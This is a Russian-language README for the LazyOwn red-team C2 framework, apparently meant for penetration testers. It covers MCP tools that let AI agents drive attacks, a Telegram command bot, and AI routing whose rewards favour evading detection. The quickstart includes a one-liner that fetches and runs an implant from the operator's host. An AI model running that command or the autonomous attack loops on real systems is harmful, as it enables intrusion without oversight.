LazyOwn

Post-Exploitation vrelease/0.2.151 · 08.06.2026 активный

Комплексный red-team фреймворк с C2 на базе AI, полиморфными имплантами и встроенными инструментами пост-эксплуатации.

vrelease/0.2.151
08.06.2026
vrelease/0.2.151
08.06.2026 current

Установка
git clone https://github.com/grisuno/LazyOwn.git && cd LazyOwn
bash install.sh
показать оригинал переведено ИИ

LazyOwn

LazyOwn_Redteam_framework

stars release Python Shell Script image image License: GPL v3 image image Ask DeepWiki Anurag's GitHub stats image

 ██▓    ▄▄▄      ▒███████▒▓██   ██▓ ▒█████   █     █░███▄    █
▓██▒   ▒████▄    ▒ ▒ ▒ ▄▀░ ▒██  ██▒▒██▒  ██▒▓█░ █ ░█░██ ▀█   █
▒██░   ▒██  ▀█▄  ░ ▒ ▄▀▒░   ▒██ ██░▒██░  ██▒▒█░ █ ░█▓██  ▀█ ██▒
▒██░   ░██▄▄▄▄██   ▄▀▒   ░  ░ ▐██▓░▒██   ██░░█░ █ ░█▓██▒  ▐▌██▒
░██████▒▓█   ▓██▒▒███████▒  ░ ██▒▓░░ ████▓▒░░░██▒██▓▒██░   ▓██░
░ ▒░▓  ░▒▒   ▓▒█░░▒▒ ▓░▒░▒   ██▒▒▒ ░ ▒░▒░▒░ ░ ▓░▒ ▒ ░ ▒░   ▒ ▒
░ ░ ▒  ░ ▒   ▒▒ ░░░▒ ▒ ░ ▒ ▓██ ░▒░   ░ ▒ ▒░   ▒ ░ ░ ░ ░░   ░ ▒░
  ░ ░    ░   ▒   ░ ░ ░ ░ ░ ▒ ▒ ░░  ░ ░ ░ ▒    ░   ░    ░   ░ ░
    ░  ░     ░  ░  ░ ░     ░ ░         ░ ░      ░            ░
                 ░         ░ ░

ko-fi

LazyOwn поставляется БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ. Это свободное программное обеспечение, и вы можете распространять его на условиях GNU General Public License v3. Подробности об использовании этого программного обеспечения см. в файле LICENSE.

LazyOwn RedTeam Framework v0.2.158

LazyOwn — это профессиональный фреймворк для red team и платформа Command & Control (C2), созданная для пентестеров, red team и исследователей безопасности. Он предоставляет 606+ команд CLI, 126 алиасов, 148 MCP-инструментов для ИИ-агентов, многооператорный веб-дашборд C2 и более 120 интеграций плагинов YAML/Lua, охватывающих полный цикл атаки (kill chain) на Linux, Windows, macOS и BSD.

Новое в v0.2.158: встроенный маркетплейс с YARA-правилами и шаблонами Nuclei, автономная эксплуатация auto_pwn, команда hunt для разведки на основе угроз, механизм подсказок после выполнения команд, автоматическое шифрование данных сессий, геймификация с ELO/бейджами и 7 новых APT-плейбуков.

Быстрый старт в трёх командах

Новичок? Вот весь процесс входа. Полное руководство: QUICKSTART.md.

git clone https://github.com/grisuno/LazyOwn.git && cd LazyOwn
bash install.sh        # virtualenv + pinned dependencies + C2 certificates
./run                  # launches the shell; first run offers the setup wizard

Установка по умолчанию лёгкая; добавьте --with-ml для тяжёлого стека torch/CUDA, --with-ollama для локального запуска LLM, --with-tools для распространённых внешних бинарников. Зависимости зафиксированы в requirements.txt (кроссплатформенное ядро) и requirements-ml.txt (опциональное ML); pyproject.toml является единственным источником истины.

Docker

Для изолированных воспроизводимых задач см. lazyown-docker/README.md.

cd lazyown-docker
./mkdocker.sh build
./mkdocker.sh run --vpn 1

Затем, внутри оболочки (LazyOwn) >:

doctor          # preflight: verifies Python, venv, packages, certs, SecLists, tools
wizard          # guided config (auto-detects lhost, walks 7 steps)
ping            # confirm the target is up and detect its OS
lazynmap        # full port + service scan

Если doctor сообщает о блокирующем сбое (красный), исправьте его перед продолжением — он укажет точную команду pip install / apt install для всего, что отсутствует. Предупреждения (жёлтые) — это опциональные функции, которые пока можно игнорировать.

Основная архитектура

LazyOwn построен на модульной, управляемой командами архитектуре, обеспечивающей гибкость и расширяемость для рабочих процессов тестирования безопасности.

diagrama_lazyown

LazyOwn объединяет интерфейс командной строки (CLI) на основе cmd2 и веб-интерфейс на основе Flask. Параметры ограничены payload.json, что обеспечивает согласованную конфигурацию между инструментами. Фреймворк поддерживает имитацию противника, планирование задач через команду cron и постоянные автоматизированные рабочие процессы имитации угроз.

image

image

Подробности см. в CONTRIBUTING.md.

LazyOwn Skills — интеграция MCP

Подключите Claude Code к фреймворку LazyOwn через Model Context Protocol (MCP). MCP-сервер предоставляет 148 инструментов, охватывающих полный жизненный цикл взаимодействия.

Файлы

Файл Назначение
skills/lazyown_mcp.py MCP-сервер — предоставляет Claude 148 инструментов LazyOwn
skills/lazyown.md Документация навыка / слэш-команды для Claude Code
skills/autonomous_daemon.py Автономный демон выполнения (управляется целями, не требует Claude между шагами)
skills/hive_mind.py Мультиагентная система «королева + дроны» с памятью ChromaDB
skills/lazyown_policy.py Механизм политик на основе вознаграждений для auto_loop
skills/lazyown_facts.py Структурированное извлечение фактов из XML-файлов nmap и выходных данных инструментов
skills/lazyown_parquet_db.py База знаний Parquet: история сессий, GTFOBins, LOLBas, ATT&CK

Быстрый старт (5 минут до первого шелла)

Полное руководство: QUICKSTART.md

# 1. Clone and install (light by default; add --with-ml for the 2 GB torch/CUDA stack, --with-ollama for the local LLM)
git clone https://github.com/grisuno/LazyOwn.git && cd LazyOwn && bash install.sh

# 2. Launch, verify the install, then run the wizard
./run
(LazyOwn) > doctor   # preflight: Python, venv, packages, certs, SecLists, tools
(LazyOwn) > wizard   # auto-detects lhost, walks 7 config steps

# Heavy optional dependencies (pycryptodome, python-libnmap, impacket, ...) are
# imported lazily: a missing package degrades only its feature instead of
# crashing the shell, and the dependent command raises a clear "pip install ..."
# error when used. To audit them without launching the shell (works even if rich
# or cmd2 are broken):  python3 -m core.dependencies

# 3. Define your authorized scope, then recon
(LazyOwn) > scope add 10.10.11.0/24 && scope mode enforce
(LazyOwn) > ping && lazynmap && auto_populate && facts_show

# 4. Start C2 (separate terminal)
bash fast_run_as_r00t.sh --no-attach --vpn 1

# 5. Get a shell — Linux BOF-capable beacon
(LazyOwn) > blacksandbeacon
# Then on target: curl -sk "http://<lhost>:<lport>/blacksandbeacon" -o /tmp/.svc && chmod +x /tmp/.svc && /tmp/.svc &

# 6. Invite teammates (multi-operator)
(LazyOwn) > collab_join alice
# Prints: https://<lhost>:<c2_port>/collab/?operator=alice

Совместная работа нескольких операторов

Слой совместной работы LazyOwn обеспечивает функциональность командного сервера в реальном времени через Server-Sent Events (SSE). Он активируется автоматически при запуске lazyc2.py.

Панель управления в браузере — откройте в любом браузере команды:

https://<lhost>:<c2_port>/collab/?operator=<your_handle>

Терминальный SSE-поток:

curl --insecure -N "https://<lhost>:<c2_port>/collab/stream?operator=alice" | jq .

Опубликовать находку для всех операторов:

curl --insecure -sk -X POST https://<lhost>:<c2_port>/collab/publish \
  -H "Content-Type: application/json" \
  -d '{"type":"finding","operator":"alice","payload":{"target":"10.10.11.5","detail":"root via CVE-2024-xxxx"}}'

Заблокировать цель (предотвращает запуск одного и того же инструмента двумя операторами):

curl --insecure -sk -X POST https://<lhost>:<c2_port>/collab/lock \
  -H "Content-Type: application/json" \
  -d '{"target":"10.10.11.5","operator":"alice","ttl_secs":300}'
Эндпоинт Метод Описание
/collab/ GET Панель управления для нескольких операторов в браузере
/collab/stream?operator=<name> GET (SSE) Поток событий в реальном времени
/collab/operators GET Список активных операторов
/collab/publish POST Трансляция структурированного события
/collab/lock POST Получение рекомендательной блокировки цели
/collab/unlock POST Снятие блокировки цели
/collab/locks GET Все активные блокировки
/collab/history?n=100 GET Последние N событий

Из CLI: collab_join <handle> выводит все URL для указанного оператора.


Быстрый старт с MCP

LazyOwn предоставляет свой полный фреймворк через Model Context Protocol (MCP). Тот же сервер работает с Claude Code, Claude Desktop, Hermes Agent и OpenCode — выберите интеграцию, соответствующую вашему окружению.

Claude Code

claude mcp add lazyown python3 /home/grisun0/LazyOwn/skills/lazyown_mcp.py

Или добавьте вручную в ~/.claude/claude_desktop_config.json:

{
  "mcpServers": {
    "lazyown": {
      "command": "python3",
      "args": ["/home/grisun0/LazyOwn/skills/lazyown_mcp.py"],
      "env": {
        "LAZYOWN_DIR": "/home/grisun0/LazyOwn"
      }
    }
  }
}

Установите слэш-команду (необязательно):

cp skills/lazyown.md ~/.claude/commands/lazyown.md

После перезапуска Claude Code все инструменты lazyown_* станут доступны.

Hermes Agent

LazyOwn является родным для Hermes. Слой интеграции skills/hermes-lazyown/ предоставляет компактную, пространственно-именованную поверхность инструментов, оптимизированную для контекстных окон Hermes, с возобновлением контрольных точек, динамической генерацией правил и нативным планированием делегирования.

Зарегистрируйте в ~/.hermes/config.yaml:

mcp_servers:
  hermes-lazyown:
    command: python3
    args: ["/home/grisun0/LazyOwn/skills/hermes-lazyown/mcp_server.py"]
    env:
      LAZYOWN_DIR: "/home/grisun0/LazyOwn"

Затем перезагрузите MCP-инструменты в Hermes с помощью /reload-mcp.

Полное руководство по интеграции Hermes см. в skills/hermes-lazyown/README.md.

OpenCode

LazyOwn дружелюбен к OpenCode через LazyOwnOpenCodeAdapter:

git clone https://github.com/grisuno/LazyOwnOpenCodeAdapter.git
cd LazyOwnOpenCodeAdapter && npm install
npm run build

Адаптер связывает MCP-сервер LazyOwn с CLI OpenCode, предоставляя ту же поверхность инструментов lazyown_* с нативными для OpenCode подсказками и рабочими процессами.

Полная настройка: https://github.com/grisuno/LazyOwnOpenCodeAdapter

Переменные окружения

Переменная По умолчанию Описание
LAZYOWN_DIR родительская папка skills/ Корневой каталог LazyOwn
LAZYOWN_C2_HOST payload.json lhost Адрес C2-сервера
LAZYOWN_C2_PORT payload.json c2_port Порт C2-сервера
LAZYOWN_C2_USER payload.json c2_user Имя пользователя C2
LAZYOWN_C2_PASS payload.json c2_pass Пароль C2

Группы инструментов MCP (148 инструментов)

Группа Инструменты Описание
Core Execution 7 run_command (теперь с dry_run + confirm), get/set_config, list_modules, discover_commands, command_help, palette
Audit & Context 6 target_context, tasks_cleanup, evidence_grep, session_diff, run_command_async, job_status
Target Management 3 add_target, list_targets, set_active_target
C2 / Implant Control 10 c2_command, c2_status, get_beacons, run_api, c2_profile, c2_vuln_analysis, c2_redop, c2_search_agent, c2_script, c2_adversary
Session Awareness 4 session_status, session_state, list_sessions, read_session_file
Autonomous Loop 3 auto_loop, policy_status, recommend_next
ACI — Автономный интеллект кампании 3 aci_plan, aci_status, aci_replan
Reactive Intelligence 2 reactive_suggest, bridge_suggest
Objectives & Planning 4 inject_objective, next_objective, soul, read_prompt
Knowledge Bases 9 parquet_query/annotate, facts_show, cve_search, searchsploit, rag_index/query, threat_model
Memory & Learning 3 memory_recall/store, eval_quality
Campaign & Reporting 7 campaign, campaign_tasks, generate_report, misp_export, collab_publish, timeline
Playbooks 2 playbook_generate, playbook_run
Addons, Tools & Plugins 3 list_addons/plugins, create_addon/tool
Scheduling 2 cron_schedule, daemon
AI Agents 5 run_agent, agent_status/result, list_agents, llm_ask
Event Engine 4 poll_events, ack_event, add_rule, heartbeat_status
SWAN MoE+RL 4 swan_run, swan_ensemble, swan_status, swan_route
Полная документация: skills/README.md и skills/lazyown.md.

Улучшения MCP в режиме аудита

Добавлено в skills/lazyown_mcp_helpers.py, чтобы сделать автономные аудиты более эффективными и менее подвержёнными ошибкам. Лдика живёт в модуле чистых функций, поэтому его можно изолированно покрывать юнит-тестами (tests/test_mcp_improvements.py).

Инструмент / Параметр Что делает Поч это важно
lazyown_session_init(format='json', include_recommend=true) Возвращает SITREP в виде структурированного словаря вместо баннера; опционально встраивает топ-3 ранжированных рекомендуемых действий. Экономит ~5 КБ декорированного текста на вызов; агенты могут фильтровать до потребления.
lazyown_campaign_sitrep(format='json') Та же опция JSON для главного отчёта смены. Единый формат для обоих инструментов работы с обстановкой.
lazyown_target_context(host, port=N) Агрегирует открытые порты, учётные данные из мировой модели (с происхождением + уверенностью), уязвимости, свежесть данных pwntomate и свежесть nmap для одной пары (host, port). Заменяет 4–5 отдельных запросов при принятии решения о следующем действии по цели.
lazyown_tasks_cleanup(dry_run=true, min_confidence=0.5) Аудирует sessions/tasks.json и помечает записи, где встроенное учётное данное на самом деле является меткой времени / URL / IP / дубликатом. Передайте dry_run=false, чтобы переписать файл (сначала создаётся .bak). Наблюдатель часто превращает временные метки логов в «учётные данные»; на реальной кампании это убирает 100+ шумных задач.
lazyown_evidence_grep(pattern, scope='all|loot|nmap|http|logs') Регулярное выражение по артефактам в sessions/ с пропуском бинарных файлов и ограничением размера. Возвращает совпадения в формате path:line. Позволяет не выходить в оболочку для кросс-проверочных запросов.
lazyown_run_command(command, dry_run=true) Предварительная проверка: возвращает базовую команду, путь к бинарнику, требуется ли ОС или соответствует ли текущей ОС, создаст ли дубликаты артефактов, отсутствующие ключи полезной нагрузки — без выполнения. Предотвращает случайные повторные запуски 30-минутных сканов; выявляет инструменты, работающие только в Windows, против цели на Linux до запуска.
lazyown_run_command_async(command, timeout) + lazyown_job_status(job_id) Паттерн фоновых задач для длинных команд (lazynmap, pwntomate, auto_loop). Немедленно возвращает job_id. Освобождает агента от блокировки на командах, задокументированных как ≥30 мин.
lazyown_session_diff(take=true) Сообщает о добавленных / изменённых / удалённых файлах в sessions/, а также о новых учётных данных / ID задач с момента последнего снимка. Делает передачу смены явной; хорошо работает как первый вызов каждой новой сессии.
Шлюз подтверждения (confirm=true) lazyown_c2_command, lazyown_c2_redop, lazyown_c2_adversary и любая run_command, тело которой соответствует rm -rf / exfil / wipe / encrypt-file, теперь требуют явный аргумент confirm=true. Предотвращает случайные разрушительные действия из автономных циклов.
Происхождение + уверенность по учётным данным Каждое учётное данное, предоставленное через target_context, включает is_likely_credential, confidence, classification и блок provenance (source_file, line_no, captured_at), если оно найдено. Требуется для цепочки хранения в отчётах пентеста.
Аннотации свежести Каждый файл свидетельств в JSON SITREP и target_context несёт age_seconds, age_human и stale=true, как только превысит freshness_threshold_seconds (по умолчанию 7 дней; настраивается при каждом вызове). Останавливает агента от использования устаревших разведывательных данных.

Улучшения CLI в режиме аудита

SOLID-слой расширения в cli/cli_enhancements.py подключается к оболочке cmd2 через существующее автообнаружение CommandSet (cli/commands/audit.py). Не потребовалось правок в ядре lazyown.py на 27 тыс. строк, кроме двух небольших хуков (ленивая загрузка алиасов, фолбэк completedefault).

Команда / хук Что делает На чём основана
fz [query] Нечёткий поиск команд по всем do_*, алиасам, плагинам и аддонам. Ранжирует точное совпадение > префикс > подстрока > похожесть последовательности. FuzzyCommandIndex
form <command> Проводит оператора через интерактивную форму параметров для команд с множеством флагов (сейчас phishing, venom, evil). Проверяет обязательные поля и перечисления options; при неинтерактивном вводе использует значения по умолчанию. InteractiveForm, FormSpec
status_tail [target] Разбирает последний sessions/scan_<target>.partial/.nmap и выводит открытые порты, процент завершения и последнюю строку, чтобы оператор мог следить за длинным сканом, не покидая оболочку. LiveStatusTail
grep_log <pattern> [--cmd <name>] Регулярное выражение по последнему транскрипту выполненных команд и их выводам. Сохраняется между перезапусками (sessions/_cli_transcript.jsonl). TranscriptStore
reload_addons Опрашивает lazyaddons/ и plugins/ и повторно регистрирует всё, что изменилось с последнего прохода, без перезапуска оболочки. AddonHotReloader
audit_complete_keys <command> [partial] Показывает, что предложил бы комплeктор, учитывающий полезную нагрузку, для данной команды. Полезно для проверки поведения автодополнения. PayloadAwareCompleter
completedefault (Tab) Хук cmd2 теперь передаёт управление комплектору, учитывающему полезную нагрузку, который предлагает ключи полезной нагрузки для set/assign, значения IP для target, ключи словарей для gobuster/ffuf, имена аддонов для run, имена плагинов для plugin и захваченные учётные данные для evil/cme/secretsdump. PayloadAwareCompleter
Динамическое разрешение алиасов cli/aliases.py теперь по умолчанию использует lazy=True: шаблоны алиасов сохраняют свои плейсхолдеры {rhost}/{lhost} и т.д. и рендерятся относительно self.params во время выполнения. set rhost X распространяется на все алиасы при следующем нажатии клавиши (без перезапуска оболочки). Предподстановка по-прежнему доступна с lazy=False. DynamicAliasResolver, cli/aliases.py
Примитивы не зависят от фреймворка и опираются на небольшие интерфейсы typing.Protocol (PayloadProvider, CommandLister, TerminalIO), благодаря чему их можно юнит-тестировать изолированно. См. tests/test_cli_enhancements.py (36 тестов).

Нечёткий выпадающий автодополнитель

Оболочка cmd2 устанавливает curses-управляемый нечёткий пикер поверх GNU readline (cli/fuzzy_picker.py). При одиночном нажатии Tab, когда доступны два или более вариантов дополнения, пикер открывает обрамлённый выпадающий список, закреплённый в нижней части терминала, показывающий каждое совпадение вместе с его описанием. Скоринг отдаёт предпочтение точным, префиксным и подпоследовательностным совпадениям перед подстрочными и похожими (тот же рейтинг, что использует отдельная команда fz), а совпавшие символы запроса подсвечиваются в каждой строке, чтобы оператор мог видеть, почему кандидат попал в список.

Навигация: ↑ / ↓ — перемещение, Page Up / Page Down — прыжок, Home / End — поиск, Backspace — редактирование запроса на месте, Tab или Enter — вставка подсвеченной команды в приглашение, Esc или Ctrl-C — отмена. Когда совпадает только один кандидат, сохраняется обычное поведение автовставки readline, чтобы пикер никогда не мешал быстрой работе оператора. Геометрия, цвета и глифы управляются через PickerConfig, а необязательный блок fuzzy_picker в payload.json может переопределить любое из его полей (например, "max_visible_rows": 8) без изменения кода.

Настраиваемое приглашение Neon Box — config_banner

Оболочка cmd2 отображает трёхстрочное приглашение Neon Box, собранное из канонического набора сегментов (user_host, iface, lhost, rhost, domain, public_ip, cwd, git, venv, time, kernel, version, battery_load). Рендерер реализован в cli/banner_config.py как небольшой SOLID-стек: один SegmentRenderer на каждый элемент информации, SegmentRegistry, value-объект BannerSettings и BannerRenderer, который выдаёт ANSI-цветной вывод. Публичный IP, версия ядра и версия LazyOwn кэшируются с TTL, поэтому приглашение остаётся субмиллисекундным после первого рендера.

Команда оболочки config_banner открывает curses-мастер в стиле Powerlevel10k с тремя вкладками — Segments, Colors, Glyphs — и живым предпросмотром итогового приглашения, закреплённым в нижней части панели. Tab / Shift+Tab переключают вкладки; ↑ / ↓ перемещаются внутри активной вкладки; Enter сохраняет в payload.json в блок banner; Escape отменяет. Привязки по вкладкам:

Вкладка Клавиши действий
Segments Space включает/выключает сегмент; a включает все сегменты; n выключает все сегменты; d восстанавливает заводские настройки.
Colors Space / → переключает на следующий именованный цвет (bright_green, bright_cyan, bright_magenta, …); ← переключает назад; d восстанавливает цвет сегмента по умолчанию.
Glyphs Space / → переключает на следующий символ для активного слота (top_left, vertical, bullet_primary, arrow, prompt_char_user, …); ← переключает назад; d восстанавливает глиф слота по умолчанию.

Приглашение оболочки обновляется сразу после сохранения — перезапуск не требуется. Операторы без TTY (CI, скрипты) по-прежнему могут управлять системой с помощью config_banner show и config_banner reset или редактировать payload вручную:

"banner": {
  "enabled": ["user_host", "iface", "rhost", "domain", "cwd", "git", "venv", "time"],
  "colors":  {"user_host": "bright_green", "rhost": "bright_red", "domain": "bright_yellow"},
  "glyphs":  {"top_left": "┌", "bottom_left": "└", "horizontal": "─", "vertical": "│",
              "bullet_primary": "❯", "arrow": "→"}
}

Имена цветов проверяются через ColorRegistry, а символы глифов — через GlyphRegistry; всё неизвестное молча откатывается к заводскому значению по умолчанию, так что некорректный payload никогда не сломает приглашение.

Граф-ориентированная навигация — UX оператора и агента от graphify

cli/graph_advisor.py загружает граф знаний, построенный /graphify по дереву исходников LazyOwn (graphify-out/graph_lazyown.json — ~1500 узлов, ~2900 рёбер, 14 сообществ), и предоставляет его как оболочке cmd2, так и MCP-серверу. Советник — это одностраничный SOLID-стек — GraphLoader (файловый ввод-вывод с mtime-кэшем), GraphIndex (индексы смежности / степени / сообществ в памяти), GraphScorer (чистый примитив ранжирования), GraphAdvisor (оркестратор) — при этом все константы хранятся в датаклассе GraphAdvisorConfig.

Команды оператора (оболочка cmd2)

Команда Назначение
graph_search <query> [limit] Нечёткий поиск узлов по метке, идентификатору или исходному файлу.
neighbors <node> [depth] [limit] Обход графа наружу от узла с указанием отношения и уверенности ребра.
god_nodes [N] Показать наиболее связанные узлы — ключевые абстракции фреймворка.
suggest_next [seeds…] [N] Рекомендовать следующие команды, двигаясь наружу от недавней активности. Без семян читает sessions/LazyOwn_session_report.csv и берёт семена оттуда.
Хук default() в оболочке теперь передаёт неизвестные команды do_* через тот же советник и существующий FuzzyCommandIndex, так что оператор, вводящий ddo_lazynmap, сразу увидит «Возможно, вы имели в виду: do_lazynmap, do_lazynmap_quick, …?» перед тостом.

Инструменты MCP (Claude Code, веб-версия Claude, любой MCP-агент)

Инструмент Назначение
lazyown_graph_summary Количество узлов, рёбер, сообществ и разрешённый путь к графу.
lazyown_graph_search Нечёткий поиск по узлам с ограничением budget_tokens, чтобы JSON-ответ никогда не превышал контекстное окно агента.
lazyown_graph_neighbors Многоуровневый обход смежности с указанием связи и уверенности — канонический запрос «от чего зависит X?».
lazyown_graph_suggest_next Рекомендация следующего шага; принимает явный список recent или читает транскрипт сессии.

Каждый инструмент MCP-графа обрезает поля списков на месте, чтобы соответствовать budget_tokens (по умолчанию 1500). Когда граф отсутствует, каждый инструмент возвращает {"available": false, "reason": "..."} вместо сбоя — оператору сообщается выполнить /graphify . один раз, и всё начинает работать.

Советник кэширует по (path, mtime), поэтому свежая пересборка /graphify автоматически подхватывается при следующей команде CLI или вызове MCP без перезапуска оболочки или MCP-сервера. См. tests/test_graph_advisor.py для 20 модульных тестов, покрывающих загрузчик, индекс, скоринг и полный API советника.

Встроенные реактивные подсказки — неблокирующие предложения следующего шага

cli/reactive_hints.py подключается к конвейеру пост-команд cmd2 через register_postcmd_hook и выводит одну приглушённую строку под выводом каждой команды, перед появлением следующего приглашения:

  ↳ do_gobuster · do_enum4linux · do_ffuf

Предложение берётся из графа знаний graphify (тот же GraphAdvisor, что используется в suggest_next), поэтому оно структурно обосновано, а не является общим списком. Хук полностью неблокирующий: он возвращает управление до того, как cmd2 отобразит приглашение, так что оператор может сразу начать вводить следующую команду.

Управление

Действие Как
Отключить подсказки на время сессии set enable_inline_hints false
Включить снова set enable_inline_hints true
Сохранить постоянно set enable_inline_hints false, затем save

Команды из списка исключений (help, ?, exit, set, show, palette, dashboard, suggest_next, graph_search, neighbors, god_nodes) никогда не создают строку подсказки — это мета-команды, где предложение добавляет шум.

Когда граф graphify отсутствует, хук молча завершает работу. Выполните /graphify . один раз, чтобы построить граф, и подсказки появятся уже при следующей команде.

Операторская TUI-панель — dashboard

cli/dashboard_tui.py — это полноэкранная панель Textual, запускаемая из оболочки с помощью:

dashboard

Она блокирует оболочку, пока открыта (как htop или lazygit). Нажмите Q или Ctrl-C, чтобы закрыть и вернуться к приглашению cmd2.

Раскладка

┌─ LazyOwn RedTeam Dashboard ─────────────────────────────────────────────────┐
│ TARGET 10.10.11.5  ATTACKER 10.10.14.5  DOMAIN target.htb  PHASE RECON  OS  │
├─────────────────────┬─────────────────────────────────┬─────────────────────┤
│  Kill Chain         │  Recent Commands                │  Ops                │
│  ✔ Recon            │  ● lazynmap        2026-05-11   │  Objective:         │
│  ▶ Enum             │  ● ping            2026-05-11   │  Initial Access     │
│  ○ Exploit          │  ● gobuster        2026-05-11   │                     │
│  ○ PrivEsc          │                                 │  Credentials: 0     │
│  ○ Lateral          │                                 │  Hashes: 0          │
│  ○ Exfil            │  Config                         │  Beacons: 0         │
│  ○ Report           │  Target: 10.10.11.5             │                     │
│                     │  C2 Port: 4444                  │                     │
├─────────────────────┴─────────────────────────────────┴─────────────────────┤
│  ↳ next: do_gobuster · do_enum4linux · do_ffuf · do_nikto                   │
└──────────────────────────────────── [Q] Quit  [R] Refresh  [?] Help ────────┘

Источники данных (автообновление каждые 5 секунд)

Панель Источник
Цель / фаза / ОС payload.json, sessions/world_model.json
Прогресс цепочки килл-чейна sessions/world_model.json → completed_phases
Последние команды sessions/LazyOwn_session_report.csv
Цель sessions/world_model.json, sessions/tasks.json
Учётные данные / хеши sessions/credentials*.txt, sessions/hash*.txt
Beacon-запросы sessions/beacons.json
Подсказки графа graphify-out/graph_lazyown.json

Требуется pip install textual (добавлено в install.sh).

Палитра команд и обнаружение с учётом графа

Инструмент MCP lazyown_palette (также доступен как команда CLI palette и веб-представление /palette с глобальным оверлеем Ctrl+K / Cmd+K на каждой странице C2) позволяет агентам и операторам просматривать более 422 команд do_* без прокрутки. Режимы:

Режим Пример Описание
Обзор palette Количество команд по фазам.
Фаза palette recon Все команды в фазе килл-чейна с однострочным описанием.
Фаза + фильтр palette enum nmap Список фазы, суженный по свободному текстовому запросу.
Поиск palette --search ldap Нечёткий поиск по имени и описанию.
Детали palette --info do_lazynmap Полная запись плюс производные от graphify calls и related соседи (какие другие команды используют общие вспомогательные функции с этой).
Следующая фаза palette --next recon Рекомендуемые команды в фазе, следующей по порядку килл-чейна.
Списки calls / related в детальном представлении формируются из
graphify-out/graph_lazyown.json (повторно генерируется навыком graphify);
при отсутствии этого файла палитра незаметно деградирует до данных только по фазам.

Telegram Hermes Bot

Бот telegram_hermes.py связывает Telegram с полным фреймворком LazyOwn через слой MCP и шлюз Hermes. Он поддерживает прямое выполнение shell-команд, делегирование автономным агентам, планирование cron-задач, взаимодействие с C2-биконами и кроссплатформенный обмен сообщениями.

Файлы

Файл Назначение
telegram_hermes.py Telegram-бот — связывает Telegram с LazyOwn MCP и шлюзом Hermes
run_telegram_hermes.sh Скрипт запуска с использованием выделенного venv
venv_telegram/ Виртуальное окружение Python с зависимостями python-telegram-bot

Быстрый старт

# 1. Create the dedicated virtual environment
cd LazyOwn
python3 -m venv venv_telegram
source venv_telegram/bin/activate
pip install python-telegram-bot nest_asyncio requests

# 2. Configure your bot token in payload.json
python3 -c "import json; p=json.load(open('payload.json')); p['telegram_token']='YOUR_BOTFATHER_TOKEN'; json.dump(p,open('payload.json','w'),indent=2)"

# 3. Launch the bot
./run_telegram_hermes.sh

Команды бота

Команда Описание
/start <secret> Аутентификация с C2-секретом из payload.json
/cmd <command> Выполнить любую команду LazyOwn shell
/sitrep Полный отчёт о состоянии кампании
/config [key] [val] Просмотр или установка значений payload.json
/addcli <client_id> Установить активного C2-клиента
/clients Список онлайн C2-имплантов
/c2 <command> Отправить команду C2-бикону
/agent <goal> Запустить автономного агента Groq/Ollama
/delegate <goal> Делегировать задачу субагенту Hermes
/cron <schedule> <cmd> Запланировать повторяющиеся команды LazyOwn
/status Показать статус демона и автономных задач
/stop Остановить любой запущенный автономный демон
/download <file> Скачать файлы из sessions/
Загрузка документа Загрузить файлы на C2-бикон

Любое обычное текстовое сообщение без префикса / обрабатывается как прямая команда LazyOwn. Действуют ограничение частоты запросов (5 команд в минуту) и тайм-ауты сессий (30 минут).

Архитектура

Бот использует ту же PTY-основанную систему выполнения команд, что и MCP-сервер (skills/lazyown_mcp.py), поэтому все команды, алиасы и аддоны LazyOwn работают без прямых Python-импортов. Автономные задачи (/agent, /delegate) запускают агентов Groq или Ollama через LazyOwn shell, а C2-команды (/c2, /clients) используют аутентифицированные конечные точки /api/command и /get_connected_clients.


Продвинутая AI-архитектура (MoE + RL + SWAN + Hive Mind)

LazyOwn интегрирует многоагентный AI-стек мирового класса, который адаптируется и улучшается в ходе каждого взаимодействия:

Смесь экспертов (MoE) — modules/moe_router.py

Пять LLM-экспертов зарегистрированы с тегами возможностей, базовыми весами и ценовыми уровнями:

Эксперт Бэкенд Сильные стороны
groq_fast Groq llama-3.1-8b-instant Разведка, перечисление, быстрые решения
groq_powerful Groq llama-3.3-70b-versatile Эксплуатация, пост-эксплуатация, сложные рассуждения
groq_deepseek_r1 Groq deepseek-r1-distill-llama-70b Повышение привилегий, пошаговые рассуждения
ollama_reason Ollama deepseek-r1:1.5b Офлайн, безопасно для приватности, детальный анализ
groq_gemma Groq gemma2-9b-it Боковое перемещение, анализ учётных данных

Маршрутизация использует температурно-масштабированный softmax (T = max(0.5, 1.5/(1+calls/50))) по скорректированным весам. Веса самонастраиваются через экспоненциальное скользящее среднее наград каждого эксперта с течением времени.

Обучение с подкреплением на моделях (RLM) — modules/rl_trainer.py

Табличное Q-обучение тренирует политику маршрутизации в ходе сессий взаимодействия:

State:  (task_type, engagement_phase, recent_reward_bucket)
Action: expert_id
Reward: r_raw - λ * detection_prob * |r_raw|    (λ=0.5)
Update: Q(s,a) ← Q(s,a) + α * [r + γ * max_a' Q(s',a') - Q(s,a)]

Гиперпараметры: α=0,10, γ=0,90, ε_start=0,20, ε_min=0,05, ε_decay=0,995. Эпсилон-жадное исследование затухает с каждым обновлением. Q-значения сохраняются в sessions/expert_qvalues.json между сессиями.

SWAN-оркестратор — skills/swan_agent.py

Интеграционный слой верхнего уровня связывает MoE + RL + Detection Oracle + Hive Memory:

  • swan_run: однокспертное выполнение с RL-управляемой маршрутизацией и пост-выполнительным Q-обновлением
  • swan_ensemble: N экспертов параллельно через ThreadPoolExecutor, синтезируются через WeightedTextAggregator
  • OutcomeEvaluator: награда = 0, когда вероятность обнаружения ≥ 70% (формирование награды с учётом обнаружения)
  • Каждый результат сохраняется в Hive Memory (ChromaDB) для кросс-сессионного обучения

Detection Oracle (Зеркало синей команды) — modules/detection_oracle.py

Предсказывает вероятность обнаружения до выполнения, используя 17 Sigma-lite правил, покрывающих: доступ к учётным данным (LSASS, SAM, DCSync), боковое перемещение (PsExec, WMI, evil-winrm), повышение привилегий (имитация токенов, именованные каналы), эксплуатацию, разведку, C2 и брутфорс. Агрегация вероятностей: P(detect) = 1 - ∏(1 - P_i) по всем сработавшим правилам.

Замкнутый цикл Purple Team — modules/auto_purple.py

Автоматический цикл измерения red-vs-blue, который выполняет offensive-действия, запрашивает LazyOwnBT для обнаружения и передает результаты обратно в Detection Oracle для калибровки.

(LazyOwn) > purple_exec nmap -sV 10.10.11.5 recon    # execute + detect
(LazyOwn) > purple_score                              # show detection rates
(LazyOwn) > purple_report                             # export CSV + JSON
(LazyOwn) > purple_dashboard                          # Textual TUI

Методы обнаружения:

Метод Что проверяет
ai_test Предсказание ML-модели LazyOwnBT
